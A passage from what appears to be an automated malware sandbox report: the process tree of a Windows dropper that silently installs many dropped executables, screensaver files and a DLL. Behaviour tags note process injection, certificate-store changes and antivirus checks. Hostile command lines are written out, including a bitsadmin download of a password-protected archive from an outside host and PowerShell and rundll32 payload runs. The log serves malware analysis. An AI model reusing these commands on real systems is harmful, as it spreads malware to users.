C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:213⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:313⤵PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:813⤵PID:852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:113⤵PID:692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:113⤵PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:113⤵PID:6928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:113⤵PID:6808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:113⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:813⤵PID:1268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:813⤵PID:5480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5828 /prefetch:213⤵PID:1632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:113⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:113⤵PID:5840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4420 /prefetch:813⤵PID:7068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:113⤵PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:113⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:113⤵PID:1564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:113⤵PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:113⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:113⤵PID:756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:113⤵PID:6972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=644 /prefetch:113⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:113⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:113⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1996 /prefetch:813⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:113⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:113⤵PID:6108
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵PID:6548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵PID:4616
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵PID:5348
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵PID:1708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe"C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe"11⤵PID:4140
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit12⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5408 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"14⤵PID:5920
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive & exit12⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive13⤵PID:6452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 23614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6004
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:4044
-
C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exeC:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654"13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2808 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵PID:2956
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe & exit12⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exeC:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe13⤵PID:3840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe & exit12⤵PID:6680
-
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe13⤵
- Suspicious use of SetThreadContext
PID:5632 -
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe14⤵
- Loads dropped DLL
PID:5000
-
-
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe14⤵PID:4080
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe & exit12⤵PID:5984
-
C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exeC:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe13⤵PID:6588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive & exit12⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive13⤵PID:2208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 23614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1044
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S & exit12⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:1116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:5312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:3400
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:6904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:3884
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4788
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:3044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
PID:5972
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
PID:5280
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
PID:3136
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵PID:4392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:3468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:2528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:5812
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:4080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:1060
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio14⤵PID:3732
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio15⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2028
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:1956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
PID:5644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:5596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵PID:3308
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵PID:3556
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=654 & exit12⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exeC:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=65413⤵PID:4004
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe"C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe" silent8⤵PID:6868
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe"C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe"6⤵PID:1244
-
-
C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3228 -
C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2092
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe"C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe"6⤵
- Executes dropped EXE
PID:5772 -
C:\Users\Admin\AppData\Roaming\2483327.scr"C:\Users\Admin\AppData\Roaming\2483327.scr" /S7⤵
- Executes dropped EXE
PID:1844
-
-
C:\Users\Admin\AppData\Roaming\4944009.scr"C:\Users\Admin\AppData\Roaming\4944009.scr" /S7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4240
-
-
C:\Users\Admin\AppData\Roaming\8460512.scr"C:\Users\Admin\AppData\Roaming\8460512.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5036
-
-
C:\Users\Admin\AppData\Roaming\3313489.scr"C:\Users\Admin\AppData\Roaming\3313489.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3160
-
-
C:\Users\Admin\AppData\Roaming\2423863.scr"C:\Users\Admin\AppData\Roaming\2423863.scr" /S7⤵PID:5012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:3332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3360 -
C:\Users\Admin\AppData\Roaming\5748237.scr"C:\Users\Admin\AppData\Roaming\5748237.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Users\Admin\AppData\Roaming\8871820.scr"C:\Users\Admin\AppData\Roaming\8871820.scr" /S6⤵
- Executes dropped EXE
PID:2452 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:2236
-
-
-
C:\Users\Admin\AppData\Roaming\4387696.scr"C:\Users\Admin\AppData\Roaming\4387696.scr" /S6⤵
